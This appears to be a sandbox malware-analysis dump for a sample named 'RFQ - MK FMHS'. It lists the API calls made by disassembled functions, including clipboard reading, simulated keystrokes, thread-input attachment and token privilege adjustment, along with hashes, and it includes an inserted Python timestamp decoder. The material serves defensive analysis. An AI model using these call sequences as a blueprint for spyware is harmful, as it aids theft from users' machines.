                    • API ID: __fread_nolock
                    • String ID:
                    • API String ID: 2638373210-0
                    • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                    • Instruction ID: 0ac1b1bcc76d01ab2ba5355add70e9adab1e813c3519ccfe3e99af4777312635
                    • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                    • Instruction Fuzzy Hash: 81E092B1204B405FDB398A24DC107E373E0EB06319F00081DF29A93342EB6278428759
                    APIs
                    • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,00EAE16B,?,?,00000000), ref: 00E75DBF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: FilePointer
                    • String ID:
                    • API String ID: 973152223-0
                    • Opcode ID: 6f166641d2e1311546a56d9dc16c2c1400a59593c15a7347f752ab0a8117a440
                    • Instruction ID: 77e83cb11b245ce01c6f46c0f5ae35bbaaadbd5e1c0e2734ee403b3d09983ee0
                    • Opcode Fuzzy Hash: 6f166641d2e1311546a56d9dc16c2c1400a59593c15a7347f752ab0a8117a440
                    • Instruction Fuzzy Hash: FBD0C77464020CBFE710DB81DC46FAD777CDB45710F100294FD0466390D6B27D548795
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: __wfsopen
                    • String ID:
                    • API String ID: 197181222-0
                    • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                    • Instruction ID: 6b5f23f48cc1618d68bbb027b6ff49d513f4902ed6f7425cab236442077d6d80
                    • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                    • Instruction Fuzzy Hash: E2B0927684020C77DE422E82EC02A593B599B40678F808020FB1C28162A673A6A09689
                    APIs
                    • GetLastError.KERNEL32(00000002,00000000), ref: 00EDD46A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ErrorLast
                    • String ID:
                    • API String ID: 1452528299-0
                    • Opcode ID: b8d5a4cf4687a2c8e3dd6aefff406a96a1861d65386a0d223d0746767bc4f2b6
                    • Instruction ID: 87b735159eb3ccbd777c41a91e4f49c1440187197139350bf7f679fc5a1a77ab
                    • Opcode Fuzzy Hash: b8d5a4cf4687a2c8e3dd6aefff406a96a1861d65386a0d223d0746767bc4f2b6
                    • Instruction Fuzzy Hash: EC7187316083018FC714EF24D891A6EB7E4EF88314F04556EF59AAB392DB70ED45CB52
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                    • Instruction ID: a9baceed18c1be8a8783994f2eeb7f6230cdae3ba21416acedd77025cc405ae3
                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                    • Instruction Fuzzy Hash: 3331C471A00105DFCF18DF58D4809A9F7A6FF59304BA4AAA5E909EB651D731EEC1CBC0
                    APIs
                    • Sleep.KERNELBASE(000001F4), ref: 00E522B1
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639798335.0000000000E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e50000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                    • Instruction ID: 7a2e7bd3db2af42ae3e66d32e6009b745e00a2ebb11ecd8031f21644bc47ed1b
                    • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                    • Instruction Fuzzy Hash: F5E0BF7594010EEFDB00EFA4D5496DE7BB4EF04312F1005A5FE05E7690DB309E548A62
                    APIs
                    • Sleep.KERNELBASE(000001F4), ref: 00E522B1
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639798335.0000000000E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e50000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                    • Instruction ID: f593daa0260e61329338545381e2da69b90be7c845c973726b6d68fc683cf50a
                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                    • Instruction Fuzzy Hash: 31E0E67594010EEFDB00EFB4D54969E7FB4EF04302F100565FD05E2280D6309D508A72
                    APIs
                      • Part of subcall function 00E72612: GetWindowLongW.USER32(?,000000EB), ref: 00E72623
                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00EFCE50
                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00EFCE91
                    • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00EFCED6
                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00EFCF00
                    • SendMessageW.USER32 ref: 00EFCF29
                    • _wcsncpy.LIBCMT ref: 00EFCFA1
                    • GetKeyState.USER32(00000011), ref: 00EFCFC2
                    • GetKeyState.USER32(00000009), ref: 00EFCFCF
                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00EFCFE5
                    • GetKeyState.USER32(00000010), ref: 00EFCFEF
                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00EFD018
                    • SendMessageW.USER32 ref: 00EFD03F
                    • SendMessageW.USER32(?,00001030,?,00EFB602), ref: 00EFD145
                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00EFD15B
                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00EFD16E
                    • SetCapture.USER32(?), ref: 00EFD177
                    • ClientToScreen.USER32(?,?), ref: 00EFD1DC
                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00EFD1E9
                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00EFD203
                    • ReleaseCapture.USER32 ref: 00EFD20E
                    • GetCursorPos.USER32(?), ref: 00EFD248
                    • ScreenToClient.USER32(?,?), ref: 00EFD255
                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00EFD2B1
                    • SendMessageW.USER32 ref: 00EFD2DF
                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00EFD31C
                    • SendMessageW.USER32 ref: 00EFD34B
                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00EFD36C
                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00EFD37B
                    • GetCursorPos.USER32(?), ref: 00EFD39B
                    • ScreenToClient.USER32(?,?), ref: 00EFD3A8
                    • GetParent.USER32(?), ref: 00EFD3C8
                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00EFD431
                    • SendMessageW.USER32 ref: 00EFD462
                    • ClientToScreen.USER32(?,?), ref: 00EFD4C0
                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00EFD4F0
                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00EFD51A
                    • SendMessageW.USER32 ref: 00EFD53D
                    • ClientToScreen.USER32(?,?), ref: 00EFD58F
                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00EFD5C3
                      • Part of subcall function 00E725DB: GetWindowLongW.USER32(?,000000EB), ref: 00E725EC
                    • GetWindowLongW.USER32(?,000000F0), ref: 00EFD65F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                    • String ID: @GUI_DRAGID$F
                    • API String ID: 3977979337-4164748364
                    • Opcode ID: 0ea5d63b53b4e8c46a3add1ab36b503743afd40c7e0dbaa81d4da6c9a43acef4
                    • Instruction ID: e41f1ba0f6a21cb50ae367d4227e08ad0849353f0fb4905d04a61d5b0bad3d22
                    • Opcode Fuzzy Hash: 0ea5d63b53b4e8c46a3add1ab36b503743afd40c7e0dbaa81d4da6c9a43acef4
                    • Instruction Fuzzy Hash: 7C42BE34208249EFC721CF28C944ABABBE6FF88318F24551DF795E72A1C7319954DB92
                    APIs
                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00EF873F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID: %d/%02d/%02d
                    • API String ID: 3850602802-328681919
                    • Opcode ID: 97f4cb4a8e172ae436f58afc4e2ba096fec8a77128781c1e6ddf086ce4c5e685
                    • Instruction ID: 9398fe6dec977e6771021a1600f4a7d201c9368c17588721315551a0d177c34e
                    • Opcode Fuzzy Hash: 97f4cb4a8e172ae436f58afc4e2ba096fec8a77128781c1e6ddf086ce4c5e685
                    • Instruction Fuzzy Hash: AC12CF71600208AFEB259F25CD49FBA7BB4EF85714F20A129FA15FA2E1DF708945CB50
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _memmove$_memset
                    • String ID: DEFINE$Oa$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                    • API String ID: 1357608183-2202602582
                    • Opcode ID: 13bb8b558f7bbe80e965ea1e56e3ff52b6cd6ece4682cb93c9945acfcced93a7
                    • Instruction ID: b3ac3811f2180078d5e50be5bf49e333ab54f583795be6c3a60c192f44920039
                    • Opcode Fuzzy Hash: 13bb8b558f7bbe80e965ea1e56e3ff52b6cd6ece4682cb93c9945acfcced93a7
                    • Instruction Fuzzy Hash: 6093A171A00215DBDB24DF68C981BEDB7B1FF48314F24916EE959BB290E7719E82CB40
                    APIs
                    • GetForegroundWindow.USER32(00000000,?), ref: 00E74A3D
                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00EADA8E
                    • IsIconic.USER32(?), ref: 00EADA97
                    • ShowWindow.USER32(?,00000009), ref: 00EADAA4
                    • SetForegroundWindow.USER32(?), ref: 00EADAAE
                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00EADAC4
                    • GetCurrentThreadId.KERNEL32 ref: 00EADACB
                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00EADAD7
                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00EADAE8
                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00EADAF0
                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 00EADAF8
                    • SetForegroundWindow.USER32(?), ref: 00EADAFB
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EADB10
                    • keybd_event.USER32(00000012,00000000), ref: 00EADB1B
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EADB25
                    • keybd_event.USER32(00000012,00000000), ref: 00EADB2A
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EADB33
                    • keybd_event.USER32(00000012,00000000), ref: 00EADB38
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EADB42
                    • keybd_event.USER32(00000012,00000000), ref: 00EADB47
                    • SetForegroundWindow.USER32(?), ref: 00EADB4A
                    • AttachThreadInput.USER32(?,?,00000000), ref: 00EADB71
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                    • String ID: Shell_TrayWnd
                    • API String ID: 4125248594-2988720461
                    • Opcode ID: a44a17ffb747e6b8dd4b418a40815ec0ee227d858f208d79a5ad1639d9239997
                    • Instruction ID: a4d79d68a5dcc8cc0687976858f3d3be5a3f3610907c24bd549a36f563832894
                    • Opcode Fuzzy Hash: a44a17ffb747e6b8dd4b418a40815ec0ee227d858f208d79a5ad1639d9239997
                    • Instruction Fuzzy Hash: 8F317571A443187FEB206F629C49F7E7E6CEF88B50F114065FA05FA1D0CA705D10EAA0
                    APIs
                      • Part of subcall function 00EC8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00EC8D0D
                      • Part of subcall function 00EC8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00EC8D3A
                      • Part of subcall function 00EC8CC3: GetLastError.KERNEL32 ref: 00EC8D47
                    • _memset.LIBCMT ref: 00EC889B
                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00EC88ED
                    • CloseHandle.KERNEL32(?), ref: 00EC88FE
                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00EC8915
                    • GetProcessWindowStation.USER32 ref: 00EC892E
                    • SetProcessWindowStation.USER32(00000000), ref: 00EC8938
                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00EC8952
                      • Part of subcall function 00EC8713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00EC8851), ref: 00EC8728
                      • Part of subcall function 00EC8713: CloseHandle.KERNEL32(?,?,00EC8851), ref: 00EC873A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                    • String ID: $default$winsta0
                    • API String ID: 2063423040-1027155976
                    • Opcode ID: 3a7267f9fe8f46f4d22c2638018cc4b4595f7bd4a036defcde5578c23c065513
                    • Instruction ID: 9cf9b6ad2472bc29359a4c49333e586e38c5f545538e73571b705b95ab00229b
                    • Opcode Fuzzy Hash: 3a7267f9fe8f46f4d22c2638018cc4b4595f7bd4a036defcde5578c23c065513
                    • Instruction Fuzzy Hash: D5813E71900209AFDF11DFA4DF45EEEBBB8AF04308F08516AF924B6161DB328E15DB60
                    APIs
                    • OpenClipboard.USER32(00EFF910), ref: 00EE4284
                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00EE4292
                    • GetClipboardData.USER32(0000000D), ref: 00EE429A
                    • CloseClipboard.USER32 ref: 00EE42A6
                    • GlobalLock.KERNEL32(00000000), ref: 00EE42C2
                    • CloseClipboard.USER32 ref: 00EE42CC
                    • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00EE42E1
                    • IsClipboardFormatAvailable.USER32(00000001), ref: 00EE42EE
                    • GetClipboardData.USER32(00000001), ref: 00EE42F6
                    • GlobalLock.KERNEL32(00000000), ref: 00EE4303
                    • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00EE4337
                    • CloseClipboard.USER32 ref: 00EE4447
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                    • String ID:
                    • API String ID: 3222323430-0
                    • Opcode ID: 35d5664b9b157503dfbe077f520430c99a038f126020faec93fbd38b23a5f443
                    • Instruction ID: 0aed93331d85cd1b4b5949e09b7f2d6799af5ab82db8fd52ffec5ec2e6f6319c
                    • Opcode Fuzzy Hash: 35d5664b9b157503dfbe077f520430c99a038f126020faec93fbd38b23a5f443
                    • Instruction Fuzzy Hash: FE51807120424AAFD311AF62EC95F7E77A8AF84B00F105529F55AF21E1DF70D909CB62
                    APIs
                    • FindFirstFileW.KERNEL32(?,?), ref: 00EDC9F8
                    • FindClose.KERNEL32(00000000), ref: 00EDCA4C
                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00EDCA71
                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00EDCA88
                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00EDCAAF
                    • __swprintf.LIBCMT ref: 00EDCAFB
                    • __swprintf.LIBCMT ref: 00EDCB3E
                      • Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82
                    • __swprintf.LIBCMT ref: 00EDCB92
                      • Part of subcall function 00E938D8: __woutput_l.LIBCMT ref: 00E93931
                    • __swprintf.LIBCMT ref: 00EDCBE0
                      • Part of subcall function 00E938D8: __flsbuf.LIBCMT ref: 00E93953
                      • Part of subcall function 00E938D8: __flsbuf.LIBCMT ref: 00E9396B
                    • __swprintf.LIBCMT ref: 00EDCC2F
                    • __swprintf.LIBCMT ref: 00EDCC7E
                    • __swprintf.LIBCMT ref: 00EDCCCD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                    • API String ID: 3953360268-2428617273
                    • Opcode ID: 47fe528991b849885bd9c9e9260c1f866a2691eb7aa83f25754c84e759f31ebe
                    • Instruction ID: 84bb4eb12842f8eaa2c7150b76094f2a2e7f8d2a50ddc4166f6be945a7fe2c85
                    • Opcode Fuzzy Hash: 47fe528991b849885bd9c9e9260c1f866a2691eb7aa83f25754c84e759f31ebe
                    • Instruction Fuzzy Hash: F4A152B1508305ABC714EB64C885DAFB7ECFF94700F40592AF599E7192EB34DA09CB62
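The record above is a timestamp formatter: it opens a file with FindFirstFileW, converts one of the FILETIME fields through FileTimeToLocalFileTime and FileTimeToSystemTime, and renders it with __swprintf using the format strings "%4d", "%02d" and "%4d%02d%02d%02d%02d%02d" (a YYYYMMDDHHMMSS stamp). The Python below is an added example, not code from the sample or from the Joe Sandbox report: it reproduces that conversion from the raw 64-bit tick count so that stamps seen in dumps or logs can be decoded offline. The bias_minutes parameter is an assumption standing in for the time-zone bias the VM had when FileTimeToLocalFileTime ran; keep it at 0 to stay in UTC.

```python
"""Decode a Windows FILETIME into the YYYYMMDDHHMMSS stamp built by the
function above.  Added example; not the sample's own code."""
from datetime import datetime, timedelta, timezone

# FILETIME counts 100-nanosecond ticks since 1601-01-01 00:00:00 UTC.
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_from_dwords(low, high):
    """Combine the dwLowDateTime/dwHighDateTime pair of a FILETIME struct
    into a single 64-bit tick count (the order the struct lays out in memory)."""
    return ((high & 0xFFFFFFFF) << 32) | (low & 0xFFFFFFFF)


def filetime_to_datetime(ticks, bias_minutes=0):
    """UTC ticks -> timezone-aware datetime.

    bias_minutes mimics FileTimeToLocalFileTime, which subtracts the zone
    bias (UTC minus local, e.g. +300 for UTC-5) of the machine that ran the
    code.  This is an assumed parameter: the report does not state the VM's
    zone, so 0 (UTC) is the safe choice for a forensic timeline."""
    utc = FILETIME_EPOCH + timedelta(microseconds=ticks // 10)
    return utc - timedelta(minutes=bias_minutes)


def filetime_to_stamp(ticks, bias_minutes=0):
    """Render with the same format string the function uses."""
    dt = filetime_to_datetime(ticks, bias_minutes)
    return "%4d%02d%02d%02d%02d%02d" % (
        dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second)


if __name__ == "__main__":
    # Constructed input: the Unix epoch expressed as a FILETIME.
    ticks = filetime_from_dwords(0xD53E8000, 0x019DB1DE)
    print(ticks, filetime_to_stamp(ticks), filetime_to_stamp(ticks, 300))
```

When correlating such a stamp with sandbox network or process events, remember that the value is local time of the analysis VM, not UTC; convert back with the VM's bias before comparing.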
                    APIs
                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00EDF221
                    • _wcscmp.LIBCMT ref: 00EDF236
                    • _wcscmp.LIBCMT ref: 00EDF24D
                    • GetFileAttributesW.KERNEL32(?), ref: 00EDF25F
                    • SetFileAttributesW.KERNEL32(?,?), ref: 00EDF279
                    • FindNextFileW.KERNEL32(00000000,?), ref: 00EDF291
                    • FindClose.KERNEL32(00000000), ref: 00EDF29C
                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00EDF2B8
                    • _wcscmp.LIBCMT ref: 00EDF2DF
                    • _wcscmp.LIBCMT ref: 00EDF2F6
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00EDF308
                    • SetCurrentDirectoryW.KERNEL32(00F2A5A0), ref: 00EDF326
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EDF330
                    • FindClose.KERNEL32(00000000), ref: 00EDF33D
                    • FindClose.KERNEL32(00000000), ref: 00EDF34F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                    • String ID: *.*
                    • API String ID: 1803514871-438819550
                    • Opcode ID: a5d15d32ee4cbe2cc3a43ddfae91d5e7c9b2d8e78ed442c3513882c0e75ecbfc
                    • Instruction ID: 51f2437b359abcd89c923a3c0625b0dfef8cb10246e0c911d10f6ceca99f5ff1
                    • Opcode Fuzzy Hash: a5d15d32ee4cbe2cc3a43ddfae91d5e7c9b2d8e78ed442c3513882c0e75ecbfc
